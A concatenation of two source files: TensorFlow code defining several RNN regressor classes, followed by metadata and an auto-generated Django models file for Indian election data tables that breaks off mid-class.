# activation=tf.nn.tanh,
name="output"
)
output = tf.squeeze(output)
return output
@staticmethod
def rnn(self, inputs):
c = None
_cell = self._cell.lower()
if _cell == 'gru':
c = tf.compat.v1.nn.rnn_cell.GRUCell(
num_units=self._layer_width
)
elif _cell == 'grublock':
c = tf.contrib.rnn.GRUBlockCellV2(
num_units=self._layer_width
)
elif _cell == 'lstm':
c = tf.compat.v1.nn.rnn_cell.LSTMCell(
num_units=self._layer_width,
use_peepholes=self._use_peepholes
)
elif _cell == 'basiclstm':
c = tf.compat.v1.nn.rnn_cell.BasicLSTMCell(
num_units=self._layer_width
)
elif _cell == 'layernormbasiclstm':
c = tf.contrib.rnn.LayerNormBasicLSTMCell(
num_units=self._layer_width
)
elif _cell == 'glstm':
c = tf.contrib.rnn.GLSTMCell(
num_units=self._layer_width,
number_of_groups=self._groups
)
elif _cell == 'gridlstm':
c = tf.contrib.rnn.GridLSTMCell(
num_units=self._layer_width,
use_peephole=self._use_peepholes,
share_time_frequency_weights=self._tied,
num_unit_shards=self._groups
# feature_size = feat_size,
# num_frequency_blocks = ?
)
elif _cell == 'grid1lstm':
c = tf.contrib.grid_rnn.Grid1LSTMCell(
num_units=self._layer_width,
use_peepholes=self._use_peepholes,
output_is_tuple=False
)
elif _cell == 'grid2lstm':
c = tf.contrib.grid_rnn.Grid2LSTMCell(
num_units=self._layer_width,
use_peepholes=self._use_peepholes,
tied=self._tied,
output_is_tuple=False
)
elif _cell == 'grid3lstm':
c = tf.contrib.grid_rnn.Grid3LSTMCell(
num_units=self._layer_width,
use_peepholes=self._use_peepholes,
tied=self._tied,
output_is_tuple=False
)
elif _cell == 'grid2gru':
c = tf.contrib.grid_rnn.Grid2GRUCell(
num_units=self._layer_width,
tied=self._tied,
output_is_tuple=False
)
elif _cell == 'lstmblock':
c = tf.contrib.rnn.LSTMBlockCell(
num_units=self._layer_width,
use_peephole=self._use_peepholes
)
elif _cell == 'nas':
c = tf.contrib.rnn.NASCell(
num_units=self._layer_width,
use_biases=True
)
elif _cell == 'ugrnn':
c = tf.contrib.rnn.UGRNNCell(
num_units=self._layer_width
)
else:
raise ValueError('unrecognized cell type:{}'.format(_cell))
output, _ = tf.compat.v1.nn.dynamic_rnn(
# output, _ = tf.nn.dynamic_rnn(
c,
inputs,
dtype=tf.float32,
sequence_length=self.seqlen
)
output = self.last_relevant(output, self.seqlen)
print('last time step: {}'.format(output.get_shape()))
return output
@staticmethod
def last_relevant(output, length):
with tf.compat.v1.name_scope("last_relevant"):
batch_size = tf.shape(input=output)[0]
relevant = tf.gather_nd(output, tf.stack(
[tf.range(batch_size), length-1], axis=1))
return relevant
@lazy_property
def cost(self):
logits = self.logits
with tf.compat.v1.name_scope("cost"):
return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)
@lazy_property
def optimize(self):
return tf.compat.v1.train.AdamOptimizer(self._learning_rate,
epsilon=1e-7).minimize(
self.cost, global_step=tf.compat.v1.train.get_global_step())
@lazy_property
def worst(self):
logits = self.logits
with tf.compat.v1.name_scope("worst"):
sqd = tf.math.squared_difference(logits, self.target)
bidx = tf.argmax(input=sqd)
max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
predict = tf.gather(logits, bidx)
actual = tf.gather(self.target, bidx)
return bidx, max_diff, predict, actual
class SRnnRegressorV3:
'''
Simple RNN Regressor using GridRNNCell, internal cell type is LSTMBlockCell.
'''
def __init__(self, data=None, target=None, seqlen=None, layer_width=200, dim=3, learning_rate=1e-3):
self.data = data
self.target = target
self.seqlen = seqlen
self._layer_width = layer_width
self._dim = dim
self._learning_rate = learning_rate
if data is not None and target is not None and seqlen is not None:
self.logits
self.optimize
self.cost
self.worst
def setNodes(self, uuids, features, target, seqlen):
self.uuids = uuids
self.data = features
self.target = target
self.seqlen = seqlen
self.logits
self.optimize
self.cost
self.worst
def getName(self):
return self.__class__.__name__
@lazy_property
def logits(self):
layer = self.rnn(self, self.data)
with tf.compat.v1.variable_scope("output"):
layer = tf.nn.selu(layer)
output = tf.compat.v1.layers.dense(
inputs=layer,
units=1,
kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
bias_initializer=tf.compat.v1.constant_initializer(0.1)
)
output = tf.squeeze(output)
return output
@staticmethod
def newCell(width, _dim):
def cell_fn(n):
return tf.contrib.rnn.LSTMBlockCell(
num_units=n,
use_peephole=True
)
c = tf.contrib.grid_rnn.GridRNNCell(
num_units=width,
num_dims=_dim,
input_dims=0,
output_dims=0,
priority_dims=0,
tied=False,
non_recurrent_dims=None,
cell_fn=cell_fn,
non_recurrent_fn=None,
state_is_tuple=True,
output_is_tuple=True
)
return c
@staticmethod
def rnn(self, inputs):
output, _ = tf.compat.v1.nn.dynamic_rnn(
self.newCell(self._layer_width, self._dim),
inputs,
dtype=tf.float32,
sequence_length=self.seqlen
)
output = tf.concat(output, 1)
output = self.last_relevant(output, self.seqlen)
return output
@staticmethod
def last_relevant(output, length):
with tf.compat.v1.name_scope("last_relevant"):
batch_size = tf.shape(input=output)[0]
relevant = tf.gather_nd(output, tf.stack(
[tf.range(batch_size), length-1], axis=1))
return relevant
@lazy_property
def cost(self):
logits = self.logits
with tf.compat.v1.name_scope("cost"):
return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)
@lazy_property
def optimize(self):
return tf.compat.v1.train.AdamOptimizer(self._learning_rate,
epsilon=1e-7).minimize(
self.cost, global_step=tf.compat.v1.train.get_or_create_global_step())
@lazy_property
def worst(self):
logits = self.logits
with tf.compat.v1.name_scope("worst"):
sqd = tf.math.squared_difference(logits, self.target)
bidx = tf.argmax(input=sqd)
max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
uuid = tf.gather(self.uuids, bidx)
predict = tf.gather(logits, bidx)
actual = tf.gather(self.target, bidx)
return uuid, max_diff, predict, actual
class SRnnRegressorV4:
'''
Simple RNN Regressor using GridRNNCell, internal cell type is LSTMBlockCell.
With alpha_dropout, selu, and lecun_normal initializer.
'''
def __init__(self, data=None, target=None, seqlen=None, layer_width=200, dim=3, dropout=0.5, learning_rate=1e-3):
self.data = data
self.target = target
self.seqlen = seqlen
self._layer_width = layer_width
self._dim = dim
self._learning_rate = learning_rate
self._dropout = dropout
if data is not None and target is not None and seqlen is not None:
self.logits
self.optimize
self.cost
self.worst
def setNodes(self, uuids, features, target, seqlen):
self.uuids = uuids
self.data = features
self.target = target
self.seqlen = seqlen
self.logits
self.optimize
self.cost
self.worst
def getName(self):
return self.__class__.__name__
@lazy_property
def logits(self):
layer = self.rnn(self, self.data)
layer = self.fcn(self, layer)
with tf.compat.v1.variable_scope("output"):
output = tf.compat.v1.layers.dense(
inputs=layer,
units=1,
# kernel_initializer=tf.variance_scaling_initializer(),
kernel_initializer=tf.compat.v1.keras.initializers.lecun_normal(),
bias_initializer=tf.compat.v1.constant_initializer(0.1)
)
output = tf.squeeze(output)
return output
@staticmethod
def fcn(self, inputs):
layer = inputs
with tf.compat.v1.variable_scope("fcn"):
layer = tf.contrib.nn.alpha_dropout(layer, keep_prob=1.0-self._dropout)
layer = tf.compat.v1.layers.dense(
inputs=layer,
units=self._layer_width,
kernel_initializer=tf.compat.v1.keras.initializers.lecun_normal(),
bias_initializer=tf.compat.v1.constant_initializer(0.1),
activation=tf.nn.selu
)
return layer
@staticmethod
def newCell(width, _dim):
def cell_fn(n):
return tf.contrib.rnn.LSTMBlockCell(
num_units=n,
use_peephole=True
)
c = tf.contrib.grid_rnn.GridRNNCell(
num_units=width,
num_dims=_dim,
input_dims=0,
output_dims=0,
priority_dims=0,
tied=False,
non_recurrent_dims=None,
cell_fn=cell_fn,
non_recurrent_fn=None,
state_is_tuple=True,
output_is_tuple=True
)
return c
@staticmethod
def rnn(self, inputs):
output, _ = tf.compat.v1.nn.dynamic_rnn(
self.newCell(self._layer_width, self._dim),
inputs,
dtype=tf.float32,
sequence_length=self.seqlen
)
output = tf.concat(output, 1)
output = self.last_relevant(output, self.seqlen)
return output
@staticmethod
def last_relevant(output, length):
with tf.compat.v1.name_scope("last_relevant"):
batch_size = tf.shape(input=output)[0]
relevant = tf.gather_nd(output, tf.stack(
[tf.range(batch_size), length-1], axis=1))
return relevant
@lazy_property
def cost(self):
logits = self.logits
with tf.compat.v1.name_scope("cost"):
return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)
@lazy_property
def optimize(self):
return tf.compat.v1.train.AdamOptimizer(self._learning_rate,
epsilon=1e-7).minimize(
self.cost, global_step=tf.compat.v1.train.get_or_create_global_step())
@lazy_property
def worst(self):
logits = self.logits
with tf.compat.v1.name_scope("worst"):
sqd = tf.math.squared_difference(logits, self.target)
bidx = tf.argmax(input=sqd)
max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
uuid = tf.gather(self.uuids, bidx)
predict = tf.gather(logits, bidx)
actual = tf.gather(self.target, bidx)
return uuid, max_diff, predict, actual
class SRnnRegressorV5:
'''
Simple RNN Regressor using GridRNNCell, internal cell type is BasicLSTMCell.
With dropout, relu, and variance_scaling_initializer.
'''
def __init__(self, data=None, target=None, seqlen=None, layer_width=200, dim=3, dropout=0.5, learning_rate=1e-3):
self.data = data
self.target = target
self.seqlen = seqlen
self._layer_width = layer_width
self._dim = dim
self._learning_rate = learning_rate
self._dropout = dropout
if data is not None and target is not None and seqlen is not None:
self.logits
self.optimize
self.cost
self.worst
def setNodes(self, uuids, features, target, seqlen):
self.uuids = uuids
self.data = features
self.target = target
self.seqlen = seqlen
self.logits
self.optimize
self.cost
self.worst
def getName(self):
return self.__class__.__name__
@lazy_property
def logits(self):
layer = self.rnn(self, self.data)
layer = self.fcn(self, layer)
with tf.compat.v1.variable_scope("output"):
output = tf.compat.v1.layers.dense(
inputs=layer,
units=1,
kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
bias_initializer=tf.compat.v1.constant_initializer(0.1)
)
output = tf.squeeze(output)
return output
@staticmethod
def fcn(self, inputs):
layer = inputs
with tf.compat.v1.variable_scope("fcn"):
layer = tf.nn.dropout(layer, rate=1 - (1.0-self._dropout))
layer = tf.compat.v1.layers.dense(
inputs=layer,
units=self._layer_width,
kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
bias_initializer=tf.compat.v1.constant_initializer(0.1),
activation=tf.nn.relu
)
return layer
@staticmethod
def newCell(width, _dim):
def cell_fn(n):
return tf.compat.v1.nn.rnn_cell.BasicLSTMCell(
num_units=n
)
c = tf.contrib.grid_rnn.GridRNNCell(
num_units=width,
num_dims=_dim,
input_dims=0,
output_dims=0,
priority_dims=0,
tied=False,
non_recurrent_dims=None,
cell_fn=cell_fn,
non_recurrent_fn=None,
state_is_tuple=True,
output_is_tuple=True
)
return c
@staticmethod
def rnn(self, inputs):
output, _ = tf.compat.v1.nn.dynamic_rnn(
self.newCell(self._layer_width, self._dim),
inputs,
dtype=tf.float32,
sequence_length=self.seqlen
)
output = tf.concat(output, 1)
output = self.last_relevant(output, self.seqlen)
return output
@staticmethod
def last_relevant(output, length):
with tf.compat.v1.name_scope("last_relevant"):
batch_size = tf.shape(input=output)[0]
relevant = tf.gather_nd(output, tf.stack(
[tf.range(batch_size), length-1], axis=1))
return relevant
@lazy_property
def cost(self):
logits = self.logits
with tf.compat.v1.name_scope("cost"):
return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)
@lazy_property
def optimize(self):
return tf.compat.v1.train.AdamOptimizer(self._learning_rate,
epsilon=1e-7).minimize(
self.cost, global_step=tf.compat.v1.train.get_or_create_global_step())
@lazy_property
def worst(self):
logits = self.logits
with tf.compat.v1.name_scope("worst"):
sqd = tf.math.squared_difference(logits, self.target)
bidx = tf.argmax(input=sqd)
max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
uuid = tf.gather(self.uuids, bidx)
predict = tf.gather(logits, bidx)
actual = tf.gather(self.target, bidx)
return uuid, max_diff, predict, actual
class SRnnRegressorV6:
'''
Simple RNN Regressor using GridRNNCell, internal cell type is BasicLSTMCell.
With batch norm, dropout, relu, and variance_scaling_initializer.
'''
def __init__(self, data=None, target=None, seqlen=None, layer_width=200, dim=3, training=None, learning_rate=1e-3):
self.data = data
self.target = target
self.seqlen = seqlen
self._layer_width = layer_width
self._dim = dim
self._learning_rate = learning_rate
self._training = training
if data is not None and target is not None and seqlen is not None:
self.logits
self.optimize
self.cost
self.worst
def setNodes(self, uuids, features, target, seqlen):
self.uuids = uuids
self.data = features
self.target = target
self.seqlen = seqlen
self.logits
self.optimize
self.cost
self.worst
def getName(self):
return self.__class__.__name__
@lazy_property
def logits(self):
layer = self.rnn(self, self.data)
layer = self.fcn(self, layer)
with tf.compat.v1.variable_scope("output"):
output = tf.compat.v1.layers.dense(
inputs=layer,
units=1,
kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
bias_initializer=tf.compat.v1.constant_initializer(0.1)
)
output = tf.squeeze(output)
return output
@staticmethod
def fcn(self, inputs):
layer = inputs
with tf.compat.v1.variable_scope("fcn"):
layer = tf.contrib.layers.batch_norm(
inputs=layer,
is_training=self._training,
updates_collections=None
)
layer = tf.compat.v1.layers.dense(
inputs=layer,
units=self._layer_width,
kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
bias_initializer=tf.compat.v1.constant_initializer(0.1),
activation=tf.nn.relu
)
layer = tf.compat.v1.layers.dropout(
inputs=layer,
rate=0.5,
training=self._training)
layer = tf.compat.v1.layers.dense(
inputs=layer,
units=self._layer_width,
kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
bias_initializer=tf.compat.v1.constant_initializer(0.1),
activation=tf.nn.relu
)
return layer
@staticmethod
def newCell(width, _dim):
def cell_fn(n):
return tf.compat.v1.nn.rnn_cell.BasicLSTMCell(
num_units=n
)
c = tf.contrib.grid_rnn.GridRNNCell(
num_units=width,
num_dims=_dim,
input_dims=0,
output_dims=0,
priority_dims=0,
tied=False,
non_recurrent_dims=None,
cell_fn=cell_fn,
non_recurrent_fn=None,
state_is_tuple=True,
output_is_tuple=True
)
return c
@staticmethod
def rnn(self, inputs):
output, _ = tf.compat.v1.nn.dynamic_rnn(
self.newCell(self._layer_width, self._dim),
inputs,
dtype=tf.float32,
sequence_length=self.seqlen
)
output = tf.concat(output, 1)
output = self.last_relevant(output, self.seqlen)
return output
@staticmethod
def last_relevant(output, length):
with tf.compat.v1.name_scope("last_relevant"):
batch_size = tf.shape(input=output)[0]
relevant = tf.gather_nd(output, tf.stack(
[tf.range(batch_size), length-1], axis=1))
return relevant
@lazy_property
def cost(self):
logits = self.logits
with tf.compat.v1.name_scope("cost"):
return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)
@lazy_property
def optimize(self):
return tf.compat.v1.train.AdamOptimizer(self._learning_rate,
epsilon=1e-7).minimize(
self.cost, global_step=tf.compat.v1.train.get_or_create_global_step())
@lazy_property
def worst(self):
logits = self.logits
with tf.compat.v1.name_scope("worst"):
sqd = tf.math.squared_difference(logits, self.target)
bidx = tf.argmax(input=sqd)
max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
uuid = tf.gather(self.uuids, bidx)
predict = tf.gather(logits, bidx)
actual = tf.gather(self.target, bidx)
return uuid, max_diff, predict, actual
| 33.549425
| 119
| 0.56811
| 3,306
| 29,188
| 4.794616
| 0.069873
| 0.044414
| 0.055517
| 0.038357
| 0.955334
| 0.954009
| 0.954009
| 0.951927
| 0.951927
| 0.951927
| 0
| 0.012878
| 0.337536
| 29,188
| 870
| 120
| 33.549425
| 0.806889
| 0.035391
| 0
| 0.884719
| 0
| 0
| 0.017277
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08445
| false
| 0
| 0.012064
| 0.021448
| 0.175603
| 0.004021
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7b07e4055655a10c1a68f8d46eeec54fcb8f21c1
| 19,931
|
py
|
Python
|
Lokdhaba_dj/v1/models.py
|
tcpd/Lokdhaba-API-dj
|
a0c306ac405392c2f86f5751ccea27725493f399
|
[
"MIT"
] | 2
|
2021-01-30T07:10:09.000Z
|
2021-08-11T01:10:24.000Z
|
Lokdhaba_dj/v1/models.py
|
tcpd/Lokdhaba-API-dj
|
a0c306ac405392c2f86f5751ccea27725493f399
|
[
"MIT"
] | null | null | null |
Lokdhaba_dj/v1/models.py
|
tcpd/Lokdhaba-API-dj
|
a0c306ac405392c2f86f5751ccea27725493f399
|
[
"MIT"
] | null | null | null |
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey and OneToOneField has `on_delete` set to the desired behavior
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
class Contested_Deposit_Losts(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Total_Candidates = models.IntegerField(db_column='Total_Candidates', blank=True, null=True) # Field name made lowercase.
Deposit_Lost = models.IntegerField(db_column='Deposit_Lost', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'contested_deposit_losts'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No'),)
class DjangoMigrations(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField()
class Meta:
managed = False
db_table = 'django_migrations'
class Maps(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Constituency_No = models.IntegerField(db_column='Constituency_No') # Field name made lowercase.
Constituency_Name = models.CharField(db_column='Constituency_Name', max_length=50) # Field name made lowercase.
Turnout_Percentage = models.DecimalField(db_column='Turnout_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Vote_Share_Percentage = models.DecimalField(db_column='Vote_Share_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Constituency_Type = models.CharField(db_column='Constituency_Type', max_length=50, blank=True, null=True) # Field name made lowercase.
Electors = models.IntegerField(db_column='Electors', blank=True, null=True) # Field name made lowercase.
N_Cand = models.IntegerField(db_column='N_Cand', blank=True, null=True) # Field name made lowercase.
Position = models.IntegerField(db_column='Position') # Field name made lowercase.
Sex = models.CharField(db_column='Sex', max_length=10, blank=True, null=True) # Field name made lowercase.
Party = models.CharField(db_column='Party', max_length=50) # Field name made lowercase.
Votes = models.IntegerField(db_column='Votes', blank=True, null=True) # Field name made lowercase.
Candidate = models.CharField(db_column='Candidate', max_length=255) # Field name made lowercase.
Margin_Percentage = models.DecimalField(db_column='Margin_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Runner = models.CharField(db_column='Runner', max_length=255, blank=True, null=True) # Field name made lowercase.
Runner_Party = models.CharField(db_column='Runner_Party', max_length=50, blank=True, null=True) # Field name made lowercase.
Runner_Sex = models.CharField(db_column='Runner_Sex', max_length=10, blank=True, null=True) # Field name made lowercase.
Nota_Percentage = models.DecimalField(db_column='Nota_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'maps'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Constituency_No'),)
class Mastersheet(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Constituency_No = models.IntegerField(db_column='Constituency_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
month = models.IntegerField(blank=True, null=True)
Poll_No = models.IntegerField(db_column='Poll_No') # Field name made lowercase.
DelimID = models.IntegerField(db_column='DelimID', blank=True, null=True) # Field name made lowercase.
Position = models.IntegerField(db_column='Position') # Field name made lowercase.
Candidate = models.CharField(db_column='Candidate', max_length=255, blank=True, null=True) # Field name made lowercase.
Sex = models.CharField(db_column='Sex', max_length=3, blank=True, null=True) # Field name made lowercase.
Party = models.CharField(db_column='Party', max_length=255, blank=True, null=True) # Field name made lowercase.
Votes = models.IntegerField(db_column='Votes', blank=True, null=True) # Field name made lowercase.
Candidate_Type = models.CharField(db_column='Candidate_Type', max_length=5, blank=True, null=True) # Field name made lowercase.
Valid_Votes = models.IntegerField(db_column='Valid_Votes', blank=True, null=True) # Field name made lowercase.
Electors = models.IntegerField(db_column='Electors', blank=True, null=True) # Field name made lowercase.
Constituency_Name = models.CharField(db_column='Constituency_Name', max_length=255, blank=True, null=True) # Field name made lowercase.
Constituency_Type = models.CharField(db_column='Constituency_Type', max_length=10, blank=True, null=True) # Field name made lowercase.
Sub_Region = models.CharField(db_column='Sub_Region', max_length=255, blank=True, null=True) # Field name made lowercase.
N_Cand = models.IntegerField(db_column='N_Cand', blank=True, null=True) # Field name made lowercase.
Turnout_Percentage = models.DecimalField(db_column='Turnout_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Vote_Share_Percentage = models.DecimalField(db_column='Vote_Share_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Deposit_Lost = models.CharField(db_column='Deposit_Lost', max_length=3, blank=True, null=True) # Field name made lowercase.
Margin = models.IntegerField(db_column='Margin', blank=True, null=True) # Field name made lowercase.
Margin_Percentage = models.DecimalField(db_column='Margin_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
ENOP = models.FloatField(db_column='ENOP', blank=True, null=True) # Field name made lowercase.
pid = models.CharField(max_length=255, blank=True, null=True)
Party_Type_TCPD = models.CharField(db_column='Party_Type_TCPD', max_length=255, blank=True, null=True) # Field name made lowercase.
Party_ID = models.IntegerField(db_column='Party_ID', blank=True, null=True) # Field name made lowercase.
last_poll = models.CharField(max_length=10, blank=True, null=True)
Contested = models.IntegerField(db_column='Contested', blank=True, null=True) # Field name made lowercase.
Last_Party = models.CharField(db_column='Last_Party', max_length=255, blank=True, null=True) # Field name made lowercase.
Last_Party_ID = models.IntegerField(db_column='Last_Party_ID', blank=True, null=True) # Field name made lowercase.
Last_Constituency_Name = models.CharField(db_column='Last_Constituency_Name', max_length=255, blank=True, null=True) # Field name made lowercase.
Same_Constituency = models.CharField(db_column='Same_Constituency', max_length=10, blank=True, null=True) # Field name made lowercase.
Same_Party = models.CharField(db_column='Same_Party', max_length=10, blank=True, null=True) # Field name made lowercase.
No_Terms = models.IntegerField(db_column='No_Terms', blank=True, null=True) # Field name made lowercase.
Turncoat = models.CharField(db_column='Turncoat', max_length=10, blank=True, null=True) # Field name made lowercase.
Incumbent = models.CharField(db_column='Incumbent', max_length=10, blank=True, null=True) # Field name made lowercase.
Recontest = models.CharField(db_column='Recontest', max_length=10, blank=True, null=True) # Field name made lowercase.
Age = models.IntegerField(db_column='Age', blank=True, null=True) # Field name made lowercase.
District_Name = models.CharField(db_column='District_Name', max_length=255, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'mastersheet'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Constituency_No', 'Poll_No', 'Position'),)
class Parties_Contests(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Parties_Contested = models.IntegerField(db_column='Parties_Contested', blank=True, null=True) # Field name made lowercase.
Parties_Represented = models.IntegerField(db_column='Parties_Represented', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'parties_contests'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No'),)
class Party_Statistics(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Party = models.CharField(db_column='Party', max_length=50) # Field name made lowercase.
Total_Seats_in_Assembly = models.IntegerField(db_column='Total_Seats_in_Assembly') # Field name made lowercase.
Total_Votes_in_Assembly = models.IntegerField(db_column='Total_Votes_in_Assembly') # Field name made lowercase.
Total_Votes_in_Contested_Seats = models.IntegerField(db_column='Total_Votes_in_Contested_Seats') # Field name made lowercase.
Total_Candidates = models.IntegerField(db_column='Total_Candidates', blank=True, null=True) # Field name made lowercase.
Winners = models.IntegerField(db_column='Winners') # Field name made lowercase.
Deposit_Lost = models.IntegerField(db_column='Deposit_Lost', blank=True, null=True) # Field name made lowercase.
Strike_Rate = models.DecimalField(db_column='Strike_Rate', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Seat_Share = models.DecimalField(db_column='Seat_Share', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Vote_Share_in_Assembly = models.DecimalField(db_column='Vote_Share_in_Assembly', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Vote_Share_in_Contested_Seats = models.DecimalField(db_column='Vote_Share_in_Contested_Seats', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Position = models.IntegerField(blank=True, null=True)
Expanded_Party_Name = models.CharField(db_column='Expanded_Party_Name', max_length=50, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'party_statistics'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Party'),)
class Partys(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Constituency_No = models.IntegerField(db_column='Constituency_No') # Field name made lowercase.
Constituency_Name = models.CharField(db_column='Constituency_Name', max_length=50) # Field name made lowercase.
Vote_Share_Percentage = models.DecimalField(db_column='Vote_Share_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Constituency_Type = models.CharField(db_column='Constituency_Type', max_length=50, blank=True, null=True) # Field name made lowercase.
Position = models.IntegerField(db_column='Position') # Field name made lowercase.
Party = models.CharField(db_column='Party', max_length=50) # Field name made lowercase.
Votes = models.IntegerField(db_column='Votes', blank=True, null=True) # Field name made lowercase.
Candidate = models.CharField(db_column='Candidate', max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'partys'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Constituency_No', 'Position'),)
class Partysummary(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Party = models.CharField(db_column='Party', max_length=50) # Field name made lowercase.
Total_Cand = models.IntegerField(db_column='Total_Cand', blank=True, null=True) # Field name made lowercase.
Winners = models.IntegerField(db_column='Winners') # Field name made lowercase.
Deposit_Lost = models.IntegerField(db_column='Deposit_Lost', blank=True, null=True) # Field name made lowercase.
Avg_Winning_Margin = models.DecimalField(db_column='Avg_Winning_Margin', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Strike_Rate = models.DecimalField(db_column='Strike_Rate', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Position = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'partysummary'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Party'),)
class Seatshares(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Party = models.CharField(db_column='Party', max_length=50) # Field name made lowercase.
partyseats = models.IntegerField(blank=True, null=True)
totalseats = models.IntegerField(blank=True, null=True)
Seats = models.DecimalField(db_column='Seats', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Position = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'seatshares'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Party'),)
class Voter_Turnout(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
male = models.DecimalField(max_digits=4, decimal_places=2, blank=True, null=True)
female = models.DecimalField(max_digits=4, decimal_places=2, blank=True, null=True)
total = models.DecimalField(max_digits=4, decimal_places=2, blank=True, null=True)
class Meta:
managed = False
